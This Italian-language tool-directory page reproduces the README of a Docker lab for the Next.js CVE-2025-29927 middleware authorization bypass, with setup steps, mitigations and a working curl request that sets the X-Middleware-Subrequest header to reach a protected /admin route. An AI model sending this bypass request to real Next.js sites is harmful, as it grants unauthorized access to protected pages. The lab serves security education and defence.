Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
NextJS-CVE-2025-29927-Docker-Lab — Lab basato su Docker per esplorare e riprodurre la vulnerabilità di bypass dell'autorizzazione middleware di Next.js CVE-2025-29927. Include app vulnerabile, passaggi di riproduzione e strategie di mitigazione per ricerca educativa sulla sicurezza. | Kitploit
Strumenti/GitHubGitHub/enochgitgamefied/nextjs-cve-2025-29927-docker-lab
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebConfigurazione ErrataApprendimento e FormazioneLab e Pratica
GitHubenochgitgamefied/nextjs-cve-2025-29927-docker-lab

NextJS-CVE-2025-29927-Docker-Lab

Lab basato su Docker per esplorare e riprodurre la vulnerabilità di bypass dell'autorizzazione middleware di Next.js CVE-2025-29927. Include app vulnerabile, passaggi di riproduzione e strategie di mitigazione per ricerca educativa sulla sicurezza.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
6 mesi faNon ancora revisionato

🚨 NextJS-CVE-2025-29927-Docker-Lab

Questo repository contiene un ambiente di laboratorio basato su Docker per esplorare e dimostrare la vulnerabilità Next.js CVE-2025-29927 in un ambiente controllato.

⚠️ DISCLAIMER: Questo laboratorio è solo a scopo educativo e di ricerca sulla sicurezza. Non esporlo a internet pubblico né utilizzarlo in produzione.


📦 Caratteristiche

  • ✅ Applicazione Next.js vulnerabile
  • ✅ Containerizzata con Docker
  • ✅ Progettata per test locali di CVE-2025-29927
  • ✅ Include rotte e interfaccia utente preconfigurate
  • ✅ Facile da configurare e avviare

🛠 Prerequisiti

Assicurati di avere installato quanto segue:

  • Docker (v20+)
  • Git
  • Opzionale: Node.js se prevedi di eseguire al di fuori di Docker

🚀 Per Iniziare

Segui questi passaggi per clonare ed eseguire il laboratorio:

1. Clona il Repository

root@kitploit:~
git clone https://github.com/enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab.git
cd NextJS-CVE-2025-29927-Docker-Lab

2. Costruisci ed Esegui con Docker

root@kitploit:~
docker-compose up --build

Questo farà:

  • Costruire l'immagine Docker
  • Avviare il server Next.js vulnerabile
  • Esporre l'app su http://localhost:3000

📂 Struttura delle Cartelle

root@kitploit:~
.
├── app/                     # Codice principale dell'app Next.js
├── public/                  # Risorse statiche (immagini, ecc.)
├── Dockerfile               # Setup Docker per l'app
├── docker-compose.yml       # Configurazione di Compose
├── .env                     # Variabili d'ambiente (se presenti)
├── README.md                # Sei qui

🧪 Test della Vulnerabilità

🛡️ CVE-2025-29927 - Bypass dell'Autorizzazione Middleware di Next.js

⚠️ AVVISO: Questa documentazione è solo a scopo educativo e di ricerca sulla sicurezza. Non distribuire l'app vulnerabile in un ambiente di produzione.


🔍 Panoramica

CVE-2025-29927 è una vulnerabilità critica di bypass dell'autorizzazione nel middleware di Next.js. Permette agli attaccanti di saltare l'autenticazione basata su middleware e accedere a rotte protette manipolando l'header X-Middleware-Subrequest.


🧪 Riproduzione della Vulnerabilità

1. Accesso a Rotte Protette Senza Autenticazione

Tenta di accedere a una rotta protetta, come /admin, senza alcuna autenticazione:

root@kitploit:~
curl http://localhost:3000/admin

Comportamento Previsto: L'accesso è negato o reindirizzato a una pagina non autorizzata.

Comportamento Vulnerabile: L'accesso è concesso senza autenticazione.

2. Bypass del Middleware Utilizzando l'Header X-Middleware-Subrequest

Invia una richiesta con l'header X-Middleware-Subrequest per bypassare i controlli del middleware:

root@kitploit:~
curl -H "X-Middleware-Subrequest: src/middleware:nowaf" http://localhost:3000/admin

Risultato: Il middleware viene bypassato e l'accesso alla rotta protetta è concesso.


🛡️ Strategie di Mitigazione

1. Aggiorna Next.js a una Versione Corretta

Aggiorna Next.js a una delle seguenti versioni in cui la vulnerabilità è stata risolta:

  • 14.2.25
  • 15.2.3
root@kitploit:~
npm install next@latest

2. Implementa un Rafforzamento del Middleware

Migliora il tuo middleware per convalidare correttamente le richieste e rifiutare quelle con header sospetti:

root@kitploit:~
import { NextResponse } from 'next/server';

export function middleware(request) {
  const subrequestHeader = request.headers.get('x-middleware-subrequest');
  if (subrequestHeader) {
    return new NextResponse('Unauthorized', { status: 401 });
  }
  // Continua con l'elaborazione normale
  return NextResponse.next();
}

3. Configura un Proxy Inverso per Rimuovere Header Sospetti

Se utilizzi un proxy inverso (es. Nginx), configuralo per rimuovere l'header X-Middleware-Subrequest dalle richieste in arrivo:

root@kitploit:~
location / {
  proxy_pass http://localhost:3000;
  proxy_set_header X-Middleware-Subrequest "";
}

📚 Riferimenti

  • NVD - CVE-2025-29927
  • Analisi di Datadog Security Labs
  • Postmortem di Vercel

Questo file VULNERABILITY.md fornisce una guida completa per comprendere e riprodurre la vulnerabilità CVE-2025-29927 in un ambiente controllato. Offre inoltre strategie pratiche di mitigazione per proteggere le tue applicazioni Next.js da tali exploit.

Per una dimostrazione dettagliata e ulteriori approfondimenti su questa vulnerabilità, puoi fare riferimento alla demo completa dell'attacco fornita da Techtalkpine sul post del blog, a sua volta collegato alla demo live su Youtube: https://techtalkpine.com/2025/03/demo-for-cve-2025-29927-nextjs/

Fammi sapere se hai bisogno di assistenza su una parte specifica di questa configurazione o di ulteriori chiarimenti sui passaggi di mitigazione.


🧹 Pulizia

Per fermare e rimuovere i contenitori:

root@kitploit:~
docker-compose down

📚 Risorse

  • Documentazione Next.js
  • Documentazione Docker
  • OWASP Top 10

⚠️ Disclaimer Legale

Questo progetto è inteso esclusivamente a scopo educativo e di ricerca. Sei responsabile dell'utilizzo in conformità con tutte le leggi applicabili e le linee guida etiche. L'autore non è responsabile per qualsiasi uso improprio o danno causato.

Scarica lo strumento